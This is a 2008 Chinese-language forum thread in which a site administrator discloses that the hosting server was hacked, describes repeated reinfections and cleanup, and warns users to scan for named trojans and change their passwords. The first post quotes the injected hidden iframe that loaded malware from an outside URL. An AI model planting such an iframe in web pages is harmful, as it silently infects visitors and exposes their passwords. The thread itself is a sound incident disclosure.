开启左侧

4月20日论坛中断的原因

楼主
资友 发表于 2008-4-21 21:16:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

欢迎注册登录后浏览更多内容!谢谢!

您需要 登录 才可以下载或查看,没有帐号?注册

x
因为网站所寄放的武汉服务器受黑骇侵扰,所有网页被注入下列代码:
<iframe src="http://ca.winvv.com/cn.htm" width=0 height=0></iframe>
凡是18日至20日打开过论坛的用户,电脑可能被上述地址的木马病毒感染:Suspicious.Trojan.Script.JS.Obcode.d这种后门病毒,大家可收索一下这个病毒名字:Suspicious.Trojan.Script.JS.Obcode.d,然后从网上找到相应的杀病毒软件,以防用户密码被盗,造成不必要的损失!
为了阻止病毒的传播,本站于20日关闭,然后把服务器上的网站文件下载到自己电脑上杀毒,再回传到服务器上。
现在网站已经没有病毒了,大家可以放心使用。
给大家带来了不便,本站深表歉意!

袁资友  2008.4.21 9:00
分享到:  微信微信 QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享分享 支持支持 反对反对

沙发
袁酉 发表于 2008-4-22 08:02:33 | 只看该作者
资友辛苦了!!

板凳
春风雨 发表于 2008-4-22 08:33:36 | 只看该作者
谢谢了!

地板
袁文淦 发表于 2008-4-22 18:44:30 | 只看该作者
资友斑竹怎么不早说啊! 害的我不得以又重装了一便系统. 为什么我们的网站也会中毒呢?有没有什么方法让我们提前知道论坛遭攻击了?

楼主| 资友 发表于 2008-4-22 22:35:47 | 只看该作者
这是我们所租用的服务器的安全问题,上面的几个网站都是这样。对不起,让大家受累了。

楼主| 资友 发表于 2008-4-27 21:24:11 | 只看该作者
请大家注意杀病毒

Hack.Exploit.Script.VBS.Realplayer.a

Suspicious.Trojan.Script.JS.Obcode.b

楼主| 资友 发表于 2008-5-7 18:06:37 | 只看该作者
骇客来访网站基本情况介绍:

4月20日左右黑客初次来访,我打开网页时发现下边信息栏有来源不明的网页,知被挂马,进入管理,见某目录有来源不明文件,查看后知其为网站地图,说明骇客来了。
  4月22日、16日、20日,我三次清除挂马,隔一天又被挂上了。
  4月25日,清除放在某目录下的用于执行命令的文件cmd.exe等文件。
  4月28日又被挂上,我懒处理得了,为了不把病毒传给宗亲,我把index文件删除了,暂停网站。放假过五一节。
  5月3日,清理代码后重新开放。当天又被挂马。5号再清理,7号再清理,8号再清理后到今天暂时没被挂马。

说明:所租用的服务器上面有六家网站,第一次入侵后把《谷城社区》也挂马了,后来就只挂我们网站了。黑客有能力挂整个服务器,但没有,只针对性我站。

楼主| 资友 发表于 2008-5-9 16:39:43 | 只看该作者
挂马后的结果:
  用户电脑如果杀病毒软件不力,可能被感染后门病毒,用户密码安全带来隐患,应及时杀病毒并修改密码。
  网站页首的文章列举清单受到破坏,点击后是空白页,只能到各栏目才能打开。
  后台管理登录不上。

楼主| 资友 发表于 2008-5-9 16:46:22 | 只看该作者
说明:
  本网站纯属个人业余爱好制作,目的是为大家交流构建平台,没收什么人或组织任何费用,这次被挂病毒代码搞得人很累,也给大家交流带来影响,特向宗亲们致歉!

自游行涯 发表于 2009-4-23 07:39:33 | 只看该作者
论坛中断很正常,每个论坛都会存在.